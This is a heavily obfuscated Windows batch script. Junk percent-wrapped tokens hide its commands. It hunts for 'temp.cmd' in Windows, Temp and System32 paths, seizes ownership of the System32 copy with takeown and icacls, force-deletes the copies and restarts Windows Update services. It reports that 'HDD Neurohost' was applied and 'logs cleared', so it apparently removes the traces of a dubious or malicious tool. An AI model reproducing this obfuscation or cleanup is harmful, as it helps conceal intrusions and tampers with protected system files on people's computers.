:%DkScbFO%:%KF% %ETbQfY%R%qhneaIeu%e%cbVrA%m%UrDu%o%Aaxgkebdb%v%xiyEp%e%qQMLunT% %evijBPwxej%t%d%e%on%m%DxVn%p%XuImqK%.%CvvRwb%c%dwCFIVyqTT%m%Hme%d%hhD% %th%f%TdMGHqbQmF%r%oK%o%oLtJA%m%LCxDVozZF% %tfFQZ%C%ddNpJxCWcI% %UZlwbyY%d%neo%r%CPVY%i%f%v%txkbSM%e%mMMHx% %Byv%(%a%r%Yfhxad%o%YLEA%b%FuQVXlZtPd%u%CaQTWggO%s%odlic%t%uJlmWmDYs% %AUrs%l%HGzk%o%kr%g%igpLVOol%i%llSj%c%R%)%OJObrLTW%
:: ================================
:%l%:%jDIIcnS% %MYImDbwH%=%JpY%=%CI%=%mN%=%YyMeAZCdS%=%zJW%=%ei%=%g%=%fpar%=%keSt%=%BQQE%=%KKoFPPErkw%=%h%=%mkIxa%=%MOOihKbAIh%=%fgnqb%=%ZPH%=%LDdCzRSTR%=%CN%=%mBPVLKm%=%TctMJC%=%MDeFzeSb%=%SnMChBOnFl%=%CooqgEmfQ%=%mXdNknyVT%=%mcRSCbtrWo%=%LBVcovc%=%pD%=%chkeAJni%=%nqJqmveAJA%=%eMAaDcL%=%hcEj%=%DPSbD%
e%xVV%c%dtnRD%h%x%o%T% %TJkfVoh%R%PKOG%e%Kh%m%UJ%o%aOjpqHt%v%OJVyyg%i%aT%n%VJ%g%j% %ikDl%t%ACoHwz%e%RhLlSW%m%fkHyARIrH%p%nvH%.%oMjMhBT%c%KLCqTpO%m%yMm%d%vpg% %dYikgKXtgh%f%NQcZBjO%r%hbQgoYP%o%xVAsTjkYj%m%aECG% %iR%C%bYRiz% %degmmZHVdt%d%MtiVKh%r%wb%i%X%v%jwHxZyKD%e%uxsEuIzO%.%sUiPBbkE%.%TfBMUf%.%DBBu%
s%eYJxj%e%pDOk%t%oVwXeWT% %Ej%"%gHxRTU%t%wWWF%e%qLR%m%kqSLrxgGjR%p%ykZEF%_%wb%c%AvyVUtZ%m%uOWDH%d%IKTyq%_%GNp%r%RUBh%e%FY%m%Q%o%KFHzDz%v%GmZGSsZewT%e%D%d%nVTKmMY%=%sbE%0%y%"%SepxRC%

:: 1) Known paths - check and delete (System32 needs takeown first)
:%rPQcFti%:%CLKG% %jHPckJ%1%QI%)%aBpeCleK% %czDkiyyZz%K%zw%n%wLyQkdDDZ%o%vuOPqFNCoK%w%m%n%asUupRTbOo% %NyH%p%YmOC%a%JbcgLp%t%ifGU%h%daI%s%wZyypA% %JboMe%-%TjkQssZ% %aOCGrWb%c%zD%h%bt%e%AMQbPz%c%EycXaSY%k%VKNQO% %zsUUWUE%a%Lu%n%ZKPddWuJWO%d%nO% %jDBN%d%chPo%e%GL%l%vjqP%e%ABQ%t%aSKxGVd%e%rnmAse% %znQzNiI%(%ASROy%S%uFNdvkLBJo%y%IvuMVcMPD%s%kqZo%t%shwJT%e%yKxVGcoWI%m%kG%3%BgvQ%2%zzQMZYG% %NGflO%n%qnfTxC%e%naXxBSgd%e%fOqoZeR%d%hpGM%s%flQ% %VwCUKLfg%t%lUqxmsd%a%ZdvQKhGJu%k%bTGAHdiiA%e%Trk%o%qyf%w%e%n%QVyRFZC% %oSnJAwHJr%f%ibywvEuP%i%KutFlwaUPP%r%ZNzw%s%BkPcllK%t%aUiKqcT%)%zFQ%
set "paths_to_check=C:\temp.cmd %SystemRoot%\temp.cmd %WinDir%\Temp\temp.cmd %TEMP%\temp.cmd %LocalAppData%\Temp\temp.cmd"
s%aUAU%e%NrdupF%t%MVXoVb% %v%"%u%p%oV%a%blfG%t%qrqB%h%PKMsZ%s%R%_%seCIdUAt%t%KsN%o%CuKdvIHgUP%_%gZRFn%c%esKTKyBxt%h%pAF%e%WHPPM%c%suu%k%p%=%qxwKQnl%C%As%:%TijLgb%\%BUN%t%L%e%dJTSVZ%m%qFObTDvXO%p%oypmZIMZ%.%j%c%jfCNchuQ%m%eOBkMvoJb%d%HyhydqjBGm% %oyrvTkBGC%%SystemRoot%\%hRHVSic%t%kQlCiGLUcp%e%s%m%oPivcjPah%p%OlTpQqaqxH%.%XceA%c%LbtZEFNse%m%kFZIJCn%d%oPnT% %zIzppcp%%WinDir%\%ioNRKQkSzD%T%QKyFkwjX%e%c%m%yvTEraadbS%p%qeaYc%\%IfSA%t%zdP%e%nPvhO%m%FRUW%p%Gfrdjfe%.%N%c%H%m%tTGtn%d%nyrHmP% %CcFqu%%TEMP%\%aWQ%t%Kczj%e%sMMEuORpam%m%JBhg%p%wD%.%R%c%H%m%KMwY%d%EwSxlHZzn% %UEGIssJ%%LocalAppData%\%vJhOQXF%T%uTXHACFl%e%bisL%m%AsPqvFuaMG%p%FsdFdyKyhL%\%TChNr%t%y%e%WdBdQaN%m%Zp%p%MLc%.%SWY%c%uLau%m%uBaIagKrZB%d%y%"%noNlWKoug%
f%bTmPTq%o%NuFg%r%ShxrFo% %MdZtqbXAxo%%%p%QquKR% %PaZic%i%bjFVgluvs%n%Dg% %nlomLUg%(%lVfPSqE%%paths_to_check%)%dnmflGpq% %uiev%d%BUH%o%K% %i%(%GVbwWXdZ%
 %cYsxNabt% %SadW% %PTkqsYcA% %uFsBXlfP%i%BXQFTyBl%f%h% %UHZJJqcD%e%E%x%bKpdcavXoT%i%kDNG%s%SA%t%AqVcFJFl% %pcbhv%"%bgksbUUVB%%%~%mvY%p%NtzX%"%kqF% %FsBDbXdJH%(%znVMnLBPNX%
 %HfNT% %jKcdtzHAmX% %XvS% %X% %xGUL% %NazUzGsmtY% %MOuMt% %asVXNiVwDW%d%tRPaGejZ%e%HUirXTqTSg%l%Bg% %EHIkLouQu%/%NhwUwNb%f%jjQZOcGAnz% %CwbOYK%/%nRJIFxwTl%q%eRvaUgio% %jbLapVHQZ%"%VeojoZqlMg%%%~%WbHgYGS%p%ntOfgC%"%ykPxUmLAr% %IPvASMx%>%ZCXfz%n%uObqBGUdJ%u%ORrigHDy%l%RSXLXTuMb% %DRTvRVAB%2%ihJGE%>%GjTqWzn%&%MJfP%1%cMAi%
        if not exist "%%~p" (echo   Removed: %%~p & set /a temp_cmd_removed+=1)
 %QkoXaFxMP% %qh% %xyFwami% %WABXA% %Cam% %We% %ixxiM% %NgiINjLdr%i%ixJ%f%DNkspTvs% %XjvEZTR%n%fwi%o%wBQqcfRrgJ%t%aocumTGfTn% %jdmTBdHbi%e%G%x%H%i%fS%s%odbkI%t%IxwN% %MDgpjGjj%"%IRca%%%~%JzUdDjygTC%p%uBQuPgtHl%"%ZTCgkdWhyX% %j%(%fFtwglXbSm%e%WGQmU%c%LVyLcAfv%h%ehSmypVy%o%Qehs% %RuoIdvaGAv% %OlNNdm% %yyBbzV%R%TG%e%GIoHB%m%JfQh%o%ySGWdlNy%v%E%e%zvqM%d%GjLyNfY%:%ACvppX% %Tw%%%~%soaCiaI%p%e% %hXDKWw%&%aeXBqwUCX% %T%s%wXyjqShyC%e%YX%t%yXogCKSR% %HIbr%/%KuvKgZu%a%NVH% %IAO%t%fUq%e%Eb%m%s%p%nxyNX%_%nqzTNTtj%c%ObhZLmzSG%m%PaGCITju%d%xVrWKHHGk%_%lKY%r%e%e%xgwbZO%m%LrEScnYG%o%YpCMfxEEIG%v%tcWLEWDXNq%e%ZEk%d%sD%+%B%=%Gw%1%NjiB%)%tR%
 %QUGNTBRFzO% %QffiEpY% %cKo% %LNFYdYj%)%NKoBpHpg%
)%XZkePl%

:: 2) System32 - take ownership then delete (admin required)
:%IxPZJNsBZ%:%MvxQ% %Xg%2%a%)%fwO% %IiLV%S%QO%y%qxKercWGH%s%wlKyBeRX%t%WKTLVnyCE%e%NtU%m%bySa%3%Pp%2%eDjtjjBGB% %LURHBbGf%-%RKLtuifO% %QmLOMr%t%VSKZlcwD%a%MrxERQ%k%ijxxuZcX%e%JaMqedw% %QcH%o%hAj%w%EuhOCydo%n%q%e%qiwxnLba%r%yhorDyUhoZ%s%Rhccw%h%Dghqa%i%g%p%CAZZW% %irULHUxbvf%t%b%h%QcDUo%e%gerslju%n%thYhvgxxzb% %OHop%d%vjMKYJe%e%TJbtRRVJaM%l%Zbyy%e%CAQqDgFow%t%DOrywhse%e%aQSZYAu% %czTOudh%(%mRIZRPxghI%a%vtlvthZ%d%qfbSdrLDss%m%iYglv%i%uxKwJqUvdf%n%YNgfI% %OBpgqmC%r%xToxBdK%e%rlrDXY%q%SxINT%u%nNwpcZmpo%i%oB%r%ep%e%AIX%d%AMRCfFNsYX%)%mLRq%
i%WC%f%iX% %ETw%e%NkURovhC%x%MPhXLhwTYj%i%pZyo%s%GfXVU%t%OT% %nqobA%"%lRO%%SystemRoot%\%KoJGSuQTm%S%qUZQFA%y%hdvLrZu%s%exeoS%t%QRkZafzur%e%rzTvJxo%m%jFAr%3%llbSpLd%2%yntkPYX%\%uQ%t%yeXjXTI%e%NSPdTzTBEU%m%AVXtTLI%p%WuAZWUA%.%npzDrKawhO%c%xAKGtGAwD%m%MCgsdCS%d%SlpVrsBI%"%qzRZ% %iPYCYVqf%(%pGCsIo%
 %twKNWOCw% %SKjDvRI% %rTu% %zJlcQQT%t%edejGfDOwx%a%LJ%k%kgNAHy%e%F%o%yDlw%w%bgNLVAld%n%kBqCudbC% %xHAySPMTEs%/%CAOBDNqsRe%f%DaIaEK% %qKk%"%Jk%%SystemRoot%\%OBaTZ%S%nEzm%y%brKoL%s%v%t%il%e%DlR%m%RAqVS%3%Frws%2%ikDrOqEl%\%GsBhtpl%t%ixFVlNgLw%e%jhJejhzF%m%bAstujhL%p%Bv%.%Bs%c%UhU%m%HKdAInaGTr%d%NVspf%"%yUcH% %Oz%>%Dad%n%oQJRRqLR%u%SXwNGJcLD%l%FeDg% %oyKsn%2%FI%>%geRlcX%&%VUZrX%1%ZBv%
    icacls "%SystemRoot%\System32\temp.cmd" /grant Administrators:F >nul 2>&1
 %DsKIi% %Pjas% %pVlyoCSsBF% %NzQ%i%vR%c%Mi%a%xEq%c%Flf%l%JnYioG%s%zvxYC% %KRkEMkhHm%"%CMpez%%SystemRoot%\%e%S%ZBtaUY%y%U%s%EpfsAui%t%exEIioFUvB%e%Z%m%mLJkig%3%rFejfryxG%2%iRvfMeJd%\%PmKNKZ%t%zyamUOMmtR%e%AM%m%PmoCRk%p%guLFQ%.%iLylAOefek%c%SONBMV%m%pULgg%d%lNK%"%IoDoNRM% %Kbdsn%/%OkCeoDooCi%g%yoszvnLJjK%r%iaiAZxdUcX%a%xHejRh%n%nBUfv%t%RVdt% %jeYohl%A%xZh%d%dgTBKNIujm%m%cyiUxgYzP%i%PFgOanHcDV%n%Zia%i%Xn%s%FLuL%t%ZjVKbD%r%tvq%a%gdC%t%ywK%o%uvamX%r%ucQNGQl%s%doKwNVkFi%:%oH%F%gFvizho% %nIA%>%qYLCDpfRw%n%tSzUug%u%YK%l%tWzGeFFkzY% %oLSgXFqCc%2%u%>%VSCtKrG%&%ehwPcgDjC%1%AsQ%
 %JfaFDYLz% %XN% %eteKOZI% %HZ%d%UN%e%rSjMSUgq%l%oNM% %IOJnbHj%/%pruMBcIBY%f%kwrPuV% %FPtVWDB%/%oqAssEllVZ%q%gLy% %X%"%SjWHV%%SystemRoot%\%GzyCZH%S%UnbwwWaqM%y%mBMVu%s%rOWQFMTu%t%uo%e%MmhSRtba%m%sTDtoCBq%3%ONRxsH%2%DXMHO%\%xRi%t%sNwFnvQles%e%P%m%KF%p%rJmHAOW%.%XfGU%c%m%m%ogANcY%d%cymifWOs%"%IqqhPPRcoA% %HFO%>%Qt%n%ISfTQzjNI%u%eMo%l%LeBbn% %ltSlb%2%m%>%Nlmj%&%Q%1%lQMcg%
    if not exist "%SystemRoot%\System32\temp.cmd" (echo   Removed: %SystemRoot%\System32\temp.cmd & set /a temp_cmd_removed+=1)
 %QhP% %fP% %ycqN% %EpYQTkPLRS%i%XILskynm%f%LZCRAQIow% %E%n%CKDC%o%xQmGr%t%FTt% %lpZk%e%GhbFllFtJw%x%TORD%i%wZyoGlx%s%Pmtj%t%eTpez% %RjLqZu%"%kpaJ%%SystemRoot%\%pSbF%S%YlZly%y%hwPrNcfB%s%DehMeaDM%t%HXWq%e%mMRrNNzjqe%m%JDwqFFUNhf%3%tnRYxI%2%hdRb%\%nEZyBVVt%t%oGMcAabXLK%e%xfVNimukaI%m%O%p%fSOdD%.%aiPoCY%c%uJWnrcUzuR%m%wb%d%FoQapCD%"%gYMSZDh% %KgYu%(%ASuIaYanq%e%GDzl%c%dvisrJz%h%HAhWZvnfm%o%RUF% %B% %qTZ% %sdpw%R%SoKgLI%e%XITqvdH%m%J%o%hCFCHxQa%v%s%e%BhQ%d%SBDFpaXCGr%:%XBpboZi% %iCq%%SystemRoot%\%ySjnltRjb%S%ctucLI%y%rFQDFMc%s%iPENEsmNm%t%YfH%e%yiwLK%m%vjpeA%3%DNUpaI%2%xcvEQaqTf%\%mvPqmHfZ%t%ks%e%GDlqCj%m%jILtk%p%XzpXBzHMe%.%ZcSuzUaDCo%c%kRxiTPby%m%Ngfdo%d%Pfveqiws% %JxDecq%&%TZ% %xQylm%s%uLj%e%NRJvqf%t%lOdnmhH% %Bt%/%fzXKw%a%ekzGxSegB% %RicJBBbEiw%t%h%e%hCvQZY%m%FdNUzU%p%fvqNLGD%_%IBLGjtONz%c%zG%m%HVgihBXat%d%OYcOiw%_%fDOqTqQh%r%nzX%e%JNYvlzTTye%m%ASzDG%o%Ug%v%cMOaFxlSl%e%mq%d%rAGbVPXzh%+%MRgDXKFqj%=%DbfLG%1%LZlytfKii%)%ESCGP%
)%k%

:: 3) Search under C:\Windows only (faster than full C:) for any remaining temp.cmd
:%NhZhcHOI%:%tIQHExSk% %PrpBHU%3%Y%)%SyUI% %XrF%S%Z%e%puWFbYlY%a%WulfeGcqlV%r%cSSYV%c%RaHCVgzui%h%zDQ% %PS%u%sgdj%n%MazWByGB%d%bwOQDylUN%e%VkICNlUyI%r%kUFy% %IybN%C%VwTs%:%DIPwiNLAv%\%U%W%MRDMCTxof%i%d%n%JxJR%d%Bb%o%J%w%IiO%s%V% %Qu%o%dpY%n%ZFFuQst%l%kTQmOoeEQv%y%SmQhlW% %anEUWRjO%(%ADYCH%f%IyfYJUwI%a%Zlrsw%s%sLSOYmhgq%t%YYR%e%U%r%yVw% %lqmY%t%jhj%h%Pul%a%ZvSjZ%n%qKaewqhmr% %lGQBmTeGP%f%VozHGvda%u%ROMEQpc%l%OIBTagWXqy%l%GSUF% %I%C%dwGfwM%:%rEtIUD%)%TEcoOvDSHE% %PO%f%btuy%o%HQWcuCU%r%HMNUPTP% %LaAmoVNlf%a%Frp%n%ixjjY%y%XFLrUf% %PBZzFrUCVp%r%KAov%e%DGuRVYAw%m%MWPbkete%a%FhSg%i%dQklGQLDF%n%dYrSvxjPZ%i%OpjMLDlE%n%vlxHLWNQ%g%UEwBtW% %bSTa%t%QN%e%c%m%FvNOTSM%p%EAezSjzpW%.%fFMsShdWlN%c%UGlKQdVGeg%m%AfsYlNH%d%z%
f%IKb%o%coPraJxo%r%IhhghOLgt% %ayxm%/%xt%r%SwWG% %lWqY%"%iDcYJ%%SystemRoot%"%GJNW% %lL%%%a%FJqfqQ% %znOKAlB%i%UrTez%n%qW% %xeZehMSbrA%(%I%t%nKGEycN%e%bAV%m%A%p%B%.%MIqHe%c%hgMrPvgej%m%MmXAmJ%d%zTdyg%)%oogNcbVTy% %AdqszEJ%d%eqWszeDZNc%o%TBbjYF% %KkG%(%QuWcIxxmyd%
 %TLMTi% %LAPZJGKRQC% %nRSg% %bCJUnFE%i%sBqZzRjmZo%f%oYVfaFVwq% %tYywm%e%UqUoiNF%x%vLgun%i%bNjKsv%s%R%t%vWgqYxAEzr% %xtPgAhV%"%YHjpm%%%a%pTHbaKKy%"%sFmJDD% %X%(%YT%
 %hbFLJCSmet% %FVgagkyNfr% %AoA% %ZpBAujjH% %kdTITv% %WX% %blAjiCmy% %ajJ%t%UL%a%CG%k%pcpuwbynj%e%moGaT%o%ptRzYRWzM%w%DHjUT%n%RH% %AbczCaaEK%/%lkCQaDCIJ%f%YoMCKYz% %kCkg%"%jeSZgcOn%%%a%McjQBR%"%EUA% %ikKkwF%>%OkMG%n%IyEmtHm%u%p%l%NXgjDzVU% %g%2%ny%>%BNriSurd%&%QJ%1%c%
        icacls "%%a" /grant Administrators:F >nul 2>&1
 %BXQwyR% %WK% %noNe% %fXOPSd% %BYWKDJsth% %nAs% %nqarXQR% %zwojybRn%i%UUufUmx%c%EVKDHCoLfY%a%P%c%W%l%qBbDWMMKvV%s%aYv% %uLEMByaY%"%uoHdqLy%%%a%biN%"%yvltiaD% %uZiMSfY%/%vwPc%g%vs%r%ZRQsmiXBl%a%ZmdD%n%cRMBhUH%t%XK% %D%A%aoeKmXfKgJ%d%SdsC%m%AMAqmac%i%cXORg%n%GxO%i%w%s%dVx%t%vMC%r%ZtgevX%a%MtJ%t%QISGGTtP%o%uhZ%r%BCiDhWRSAl%s%WXPdZ%:%YvNEunLc%F%iy% %uTDLAyV%>%FhgYuWSxMo%n%JKTMR%u%cvs%l%krWE% %gAKjmaqLsW%2%ufiHk%>%SyDb%&%x%1%CIOj%
 %vNYghffv% %iHuYbwS% %UdVEYwjI% %oqrd% %NuqRl% %jINWcu% %QAArWNFqoO% %ZGzhXdPJy%d%ZfJJ%e%bIP%l%nd% %h%/%zhEAXURLE%f%itY% %CiPRzc%/%G%q%nuyHCOL% %nXaJbnS%"%UceQpLRBfz%%%a%ZBFFKldNS%"%Hg% %ce%>%yvAfx%n%KcIR%u%XAYevfTzjR%l%gVTswSI% %d%2%z%>%yAiqS%&%RVbKYmhCT%1%azkeF%
        if not exist "%%a" (echo   Removed: %%a & set /a temp_cmd_removed+=1)
 %TBn% %dhvA% %BPVOOEy% %kUee% %mEIhXKP% %exOhHljSJo% %qjux% %omeETOnj%i%yxFjdCA%f%C% %NmKLhf%n%cvkiAo%o%IAqO%t%LTWSYLlBM% %FoBLYVMG%e%sDrdh%x%zqOPjOco%i%AXoYZUQXsi%s%LAyJC%t%xFIDRALp% %DhJwPRiQad%"%VCAR%%%a%YdQae%"%lUiD% %kfEomIeQ%(%p%e%o%c%ZuRRk%h%VNdH%o%SjbObolXP% %ph% %LuoTJ% %pKI%R%Ri%e%HCruIWqh%m%klPz%o%eGkV%v%qoHcL%e%Y%d%U%:%lGnRyMW% %TzEvneuT%%%a%KJDSxNJph% %Yqv%&%fESm% %lKeaOa%s%q%e%nrGgxOXUUT%t%c% %iQbzUtD%/%UTCRhPsGKw%a%hE% %ySizbcNXT%t%rHVYjBScAV%e%Xe%m%ChuxsuL%p%qTleS%_%GqV%c%WiKCbdhqe%m%WsZPrhBcnM%d%cRrq%_%XkQOSCX%r%r%e%jKThFSv%m%FXFTCaVVdq%o%G%v%zwSQ%e%c%d%xFqy%+%jnni%=%WntqWZHr%1%AqBWN%)%TXrkdb%
 %tdle% %Y% %pMzl% %hck%)%GzNv%
)%ZRBnJ%

i%cWkAc%f%jBdktJbWT% %KNfWzJ%!%oxK%t%TclYHvsBS%e%hojjzbE%m%g%p%oVY%_%GfP%c%G%m%cHSZGIc%d%kwd%_%KojpN%r%TynkS%e%E%m%cz%o%edfjQSRV%v%juSdlUw%e%xikMeY%d%AkEI%!%UiWuaCZdv% %KfYGV%g%ZTcWIeLjgl%t%GIUSTibFy%r%PczFyKY% %jz%0%HfzuGyxkb% %uDALv%(%oxitdHCvvc%e%ceBUcZ%c%Y%h%vrI%o%U% %nPMqNz%t%kIH%e%RZNafllXM%m%YpkyzqOIEK%p%WOs%.%go%c%tpnD%m%K%d%wY% %Fu%r%LocNS%e%MnizVBGGm%m%KDhwoA%o%fZdnktc%v%ZAVugL%a%tboVFGTPOz%l%SIqYsYyh% %VfnZrFJE%d%akjf%o%M%n%ux%e%pNcc%.%AJnNLDAqxK%)%BBWTiZ% %KfJwtkU%e%PNyfathptg%l%ewmZnd%s%EonEvGC%e%BqSMdkAjO% %nSY%(%kKp%e%rjDxtDQxG%c%QF%h%IyOcTISnIT%o%avV% %OilzJMWBZm%N%QYpBm%o%zyPIB% %GZXC%t%FNFc%e%mZvTkhaAg%m%iw%p%FspzDwn%.%CqmDIIS%c%RtufQP%m%oqgJrFYmuk%d%XWppNEVb% %KHHJonQNpJ%f%TNE%o%IOvVxB%u%Q%n%IWTawKfdFA%d%VRmUdTMet% %YNXJSsRo%o%xkbC%n%NTedlFSjm% %ofqzY%C%BqtFjHJj% %pePYVDouiL%d%aGJKAl%r%JotPhAo%i%VeYouX%v%mPa%e%CZXKGLbGI%.%IMc%)%g%
e%whYl%c%c%h%rtlHaLfj%o%wdU%.%MJnmZkReBY%

e%gpZY%c%keb%h%WjnVPyK%o%QFjnRRM% %Uz%D%DyKwjkaF%o%bRr%n%qtHqPLxh%e%rpx%!%LkAKPLM% %D%H%QOFxX%D%wOR%N%XaHvwuTJ% %jw%N%hGrxr%e%ApyIJEAh%u%AXlYomGd%r%ot%o%J%h%VTRaWk%o%GcnqC%s%xkgfwrWfRV%t%mwGrNfChTE% %njNs%h%m%a%oufeWvQvx%s%AbRcd% %lzH%b%mkvhycGG%e%Ag%e%LNssreb%n%JhWnHl% %nVtNs%s%gFJmJq%u%PiXp%c%pvGDgM%c%K%e%cSekVtjdxA%s%UurdFOTPi%s%uzbakfWw%f%rHGqPNOCZ%u%LmB%l%rGgeMAzraA%l%HgLJKL%y%AErYIK% %cH%a%hV%p%qiopDzrN%p%x%l%QwBIoOHts%i%G%e%YXEVJ%d%JTv% %dXhanCCj%a%DSUAQ%n%MIrbhpXIS%d%XSe% %XuhuZFnXIH%l%ssRkLktnD%o%klFvI%g%raR%s%ISZAsDbey% %VS%c%BBs%l%uWVfkXZP%e%dFdQDXFCiL%a%oy%r%kGVJpxp%e%JFNvj%d%Ywrr%.%QoGDH%
p%piUNAEi%a%rvfkeBDmH%u%oRbIy%s%ovXbtvp%e%nI%
g%TopxfjgYV%o%KofAbO%t%wdv%o%I% %FYIAfW%m%Fpc%e%oFTs%n%PDeI%u%BNEGHeK%

:: Restart stopped services
:%PlmX%:%UvtERy% %vnLVzi%R%zoSdPijCJO%e%PVqYiwZS%s%AAViu%t%PhpkTpcss%a%z%r%YzXPsAtHdd%t%vub% %TKMJU%s%AOfBg%t%sxWMBoxTxq%o%qHA%p%YdmGtGL%p%RcLpjIpopF%e%ayPU%d%VrVQIwrnLT% %KQ%s%fpn%e%eH%r%ENNtMWHeX%v%H%i%zGgqm%c%BW%e%vkvrS%s%YEo%
n%gHPRQJJG%e%g%t%YUeAphQc% %P%s%zGn%t%jr%a%Ql%r%XTttaLL%t%ulGRiKRyz% %wnTzLA%w%twfpXlCiX%u%b%a%woJhxZxjNv%u%GzjHtm%s%sFNCOEY%e%SsZcluRH%r%ZglZhDvDUE%v%HGekYv% %TzlwPxwUJm%>%qFnZkEBQk%n%YE%u%jeSVhdY%l%CzIhn% %gWAdxfete%2%PXfWCPl%>%uohYjm%&%uelMR%1%GRSoQGQACA%
n%KjbtJauKYb%e%Hf%t%oTDo% %GDStNyiF%s%UZlO%t%ImLL%a%rwY%r%UtT%t%qw% %iLrK%t%WtBdB%r%ZnQvMz%u%zmworGNvhh%s%VYah%t%G%e%QsegB%d%fDHUcQ%i%FsHHLXgO%n%elMN%s%u%t%dGVz%a%cP%l%ly%l%llwnSf%e%MPX%r%K% %hiCoMsl%>%t%n%GrfQRz%u%RkF%l%vXPmVfdL% %aMrLwYnv%2%S%>%cKQfMPRWK%&%kRgTBZhQ%1%LbJPWJlcB%
